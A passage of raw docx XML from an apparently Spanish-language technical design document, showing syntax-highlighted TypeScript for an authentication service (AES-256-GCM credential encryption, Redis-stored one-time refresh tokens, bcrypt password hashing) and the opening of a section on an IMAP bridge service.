        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../config/redis.js'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ALGORITHM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'aes-256-gcm'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ENCRYPTION_KEY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>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ENCRYPTION_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'hex'</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AuthService {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">encryptCredentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(plain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 ciphertext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iv</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tag</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KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> iv </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> crypto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">randomBytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</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cipher </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> crypto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">createCipheriv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(ALGORITHM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ENCRYPTION_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> iv)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">let</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ciphertext </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">update</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(plain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'utf8'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'hex'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    ciphertext </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'hex'</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tag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">getAuthTag</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ciphertext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> iv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> iv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'hex'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'hex'</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static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">decryptCredentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(ciphertext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iv</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tag</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decipher </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> crypto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">createDecipheriv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      ALGORITHM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ENCRYPTION_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>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(iv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'hex'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    decipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">setAuthTag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'hex'</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plaintext </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> decipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">update</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(ciphertext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'hex'</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    plaintext </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">+=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> decipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'utf8'</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plaintext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:br/>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createRefreshToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(userId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tokenId </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> crypto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">randomBytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'hex'</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tokenFamily </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> crypto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">randomBytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'hex'</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setex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`refresh:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">tokenId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3600</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// 7 días</w:t>
      </w:r>
      <w:r>
        <w:br/>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userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> family</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tokenFamily</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>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tokenId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:br/>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validateRefreshToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(tokenId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get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`refresh:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">tokenId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del</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`refresh:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">tokenId</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CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// one-time use</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(data)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:br/>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hashPassword</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(password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bcrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(password</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182"/>
    <w:bookmarkStart w:id="183" w:name="imap-bridge-service"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.2.4 IMAP Bridge Service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El servicio de sincronización IMAP utiliza imapflow con un pool de conexiones y la estrategia headers-first, body-on-demand que permite cargar bandejas en menos de un segundo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[1]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[3]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/api/src/services/imap-bridge.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { ImapFlow } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
